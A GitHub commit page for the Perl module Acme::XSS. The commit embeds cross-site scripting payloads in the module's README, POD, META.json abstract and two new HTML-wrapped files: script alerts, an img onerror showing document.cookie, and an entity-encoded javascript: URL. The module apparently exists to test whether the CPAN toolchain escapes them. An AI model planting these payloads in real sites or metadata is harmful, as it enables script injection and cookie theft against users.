Skip to content

Commit

Permalink
documentation, more xss stuff
Browse files Browse the repository at this point in the history
  • Loading branch information
tokuhirom committed Aug 28, 2013
1 parent 056589f commit 7ad21ac
Show file tree
Hide file tree
Showing 5 changed files with 24 additions and 6 deletions.
2 changes: 1 addition & 1 deletion META.json
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
{
"abstract" : "XSS",
"abstract" : "\"><xmp>XSS Testing",
"author" : [
"Tokuhiro Matsuno <tokuhirom AAJKLFJEF GMAIL COM>"
],
Expand Down
7 changes: 5 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,16 +1,19 @@
# NAME

Acme::XSS - XSS
Acme::XSS - "><xmp>XSS Testing

# SYNOPSIS

use Acme::XSS;
<xmp>

# DESCRIPTION

Acme::XSS is
This is a module to testing CPAN toolchain.

<script>alert("all your codes are belongs to us");</script>
<img onerror="javascript:alert(document.cookie);" src="/">
<IMG SRC=&\#x6A&\#x61&\#x76&\#x61&\#x73&\#x63&\#x72&\#x69&\#x70&\#x74&\#x3A&\#x61&\#x6C&\#x65&\#x72&\#x74&\#x28&\#x27&\#x58&\#x53&\#x53&\#x27&\#x29>

# AUTHOR

Expand Down
9 changes: 6 additions & 3 deletions lib/Acme/XSS.pm
Original file line number Diff line number Diff line change
Expand Up @@ -13,19 +13,22 @@ __END__
=head1 NAME
Acme::XSS - XSS
Acme::XSS - "><xmp>XSS Testing
=head1 SYNOPSIS
use Acme::XSS;
use Acme::XSS;
<xmp>
=head1 DESCRIPTION
Acme::XSS is
This is a module to testing CPAN toolchain.
=begin html
<script>alert("all your codes are belongs to us");</script>
<img onerror="javascript:alert(document.cookie);" src="/">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
=end html
Expand Down
11 changes: 11 additions & 0 deletions lib/Acme/XSSism.pm
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
<html><body><script>alert(document.cookie);</script><pre>
package Acme::XSSism;
use strict;
use warnings;
use utf8;
use 5.010_001;



1;
</pre></body></html>
1 change: 1 addition & 0 deletions xss.html
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<html><body><script>alert(document.cookie);</script><pre></pre></body></html>

0 comments on commit 7ad21ac

Please sign in to comment.